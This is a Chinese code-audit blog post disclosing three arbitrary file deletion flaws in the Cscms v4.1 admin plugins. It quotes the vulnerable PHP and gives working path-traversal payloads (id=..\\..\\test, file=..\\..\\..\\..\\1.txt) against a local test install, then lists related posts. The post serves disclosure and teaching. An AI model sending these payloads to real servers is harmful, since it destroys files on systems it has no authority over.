【代码审计】Cscms_v4.1 任意文件删除漏洞实例
环境搭建:
CSCMS :http://www.chshcms.com/
网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05)
程序源码下载:https://github.com/chshcms/cscms
漏洞实例一:
漏洞文件位置:\cscms\plugins\sys\admin\Basedb.php 第160-177行:
public function del(){
$dir = $this->input->get_post('id',true);
if(empty($dir)){
getjson(L('plub_11'));
}
$dirs = array();
if(!is_array($dir)){
$dirs[] = $dir;
}else{
$dirs = $dir;
}
foreach($dirs as $dir) {
deldir(FCPATH.'attachment/backup/'.$dir);
}
$info['msg'] = L('plub_12');
$info['url'] = site_url('basedb/restore').'?v='.rand(1000,9999);
getjson($info,0);
}
漏洞利用:
1、 根目录下新建test目录作为测试:
2、 构造参数成功删除test目录
http://127.0.0.1/admin.php/basedb/del
POST:id=..\\..\\test
漏洞实例二:
漏洞文件位置:/plugins/sys/admin/Skin.php 第418--440行:
public function del(){
$ac = $this->input->get('ac',true);
$op = $this->input->get('op',true);
$dir = $this->input->get('dirs',true);
$file = $this->input->get('file');
if($ac!='mobile') $ac='pc';
if($op!='home' && $op!='user') $op='skins';
if(empty($dir)) getjson(L('plub_27'));
$skin_dir = VIEWPATH.$ac.FGF.$op.FGF.$dir.FGF.$file;
if (!is_dir($skin_dir)) { //文件
$res=unlink($skin_dir);
}else{ //目录
$res=deldir($skin_dir);
}
if($res){
$info['url'] = site_url('skin').'?ac='.$ac.'&op='.$op.'&v='.rand(1000,9999);
$info['msg'] = L('plub_46');
$info['turn'] = 1;
getjson($info,0);
}else{
getjson(L('plub_28'));
}
漏洞利用:
网站根目录下新建1.txt文件作为测试,构造URL成功删除文件
Payload:http://127.0.0.1/admin.php/skin/del?ac=pc&op=skins&dirs=default&file=..\\..\\..\\..\\1.txt
漏洞实例三:
漏洞文件位置:/plugins/sys/admin/Plugins.php 第285-299行:
public function del(){
$dir = $this->input->get_post('dir',true);
if($dir==''){
getjson(L('plub_del_0'),1);
}
deldir(FCPATH.'plugins'.FGF.$dir.FGF);
//删除配置目录
deldir(CSCMS.$dir.FGF);
//删除模板目录
deldir(FCPATH.'tpl/admin/'.$dir.FGF);
$info['func'] = __FUNCTION__;
$info['msg'] = L('plub_del_1');
getjson($info,0);
}
漏洞利用:
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
【代码审计】Cscms_v4.1 任意文件删除漏洞实例相关推荐
- 【代码审计】任意文件删除漏洞实例
[代码审计]任意文件删除漏洞实例 任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件. 环境搭建: CSCMS :http://www.chshcms.com/ 网站源码版本:Cscms_v ...
- PHP代码审计——任意文件删除漏洞(YXcms)
一.代码审计 在我的资源中下载:: YXcms-含有任意文件删除漏洞的源码包 下载即可 删除文件的代码在del()方法,首先通过GET方式接收参数fname传递过来的的值,然后执行in()函数 跟踪i ...
- 【代码审计】任意文件读取漏洞实例
0x00 前言 大多数网站都提供读取文件功能,一般实现过程是,根据参数filename的值,获得该文件在网站上的绝对路径,读取文件. 这里,通过两个任意文件读取漏洞实例去展示漏洞原理.漏洞危害. 0x ...
- 【代码审计】CLTPHP_v5.5.3后台任意文件删除漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
- 服务器漏洞文件被删除漏洞,【华中科技大学 - 漏洞预警】Wordpress = 4.9.6 任意文件删除漏洞...
昨日,互联网上公开了Wordpress <= 4.9.6的任意文件删除漏洞及分析利用材料.该漏洞影响Wordpress全部版本(<= 4.9.6).在攻击者获得基础权限后,可升级角色权限, ...
- php任意文件删除漏洞,myblog/phpyun4.3任意文件删除漏洞.md at master · source-trace/myblog · GitHub...
phpyun-expect.class.php任意文件 漏洞信息 公开时间: 2017/08 影响版本: 4.3 利用难度: 2 挖掘难度: 2 漏洞说明 漏洞出现的原因是在于没有对数据进行很好的校验 ...
- CLTPHP 5.8 后台任意文件删除漏洞
CLTPHP 5.8 后台任意文件删除漏洞 一.漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二.漏洞影响 CLTPHP 5.8及之前版本 三.复现过程 ...
- php任意文件删除漏洞,phpyun二次任意文件删除漏洞
### 简要描述: 只要有任意文件删除 这系统绝对崩. 我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die() 伤不起啊 ### 详细说明: 问题出在 friend ...
- php任意文件删除漏洞,phpshe后台任意文件删除漏洞及getshell | CN-SEC 中文网
摘要 phpshe是一个开源商城程序,程序在前台入库的地方都用了pe_dbhold函数(mysql_real_escape_string,htmlspecialchars过滤),虽然用的是全局变量注册 ...
最新文章
- 神舟战神_14英寸小钢炮 神舟战神S72021S5开箱
- 新概念C语言能力教程练习3答案,新概念C语言教程答案参考(自做)中国电力
- unlink与close关系
- SAP CRM WebClient UI里的文件是如何上传到ABAP Netweaver后台的
- 从多级延迟触发器到边沿检测
- php word excel,PHP 生成word 和 excel 文档
- uniapp光标自动定义到文本框_特检自动化行吊静力检测方案
- 汉诺塔问题 hdu 2064 hdu1997
- 【百度地图API】如何批量转换为百度经纬度
- Yarn篇--搭建yarn集群
- 用户视图切换为Linux视图,视图_ITPUB博客
- com.autonavi.amap.mapcore.MapCore.nativeNewInstance:(Ljava/lang/String;Ljava/lang/String;)J
- 2017cad光标大小怎么调_2017版CAD画直线时怎么设置光标处有显示长度和角度的?...
- ESP8266-Arduino编程实例-BME280环境传感器驱动
- 提高自己社会竞争力的书籍
- R语言-两总体均值对比
- h5的第一天 做的自定义调色器
- STM32低功耗模式
- 2022年湖南省中医执业医师考试第二单元中医诊断学(一)
- python 数据分析day4 Pandas 之 DataFrame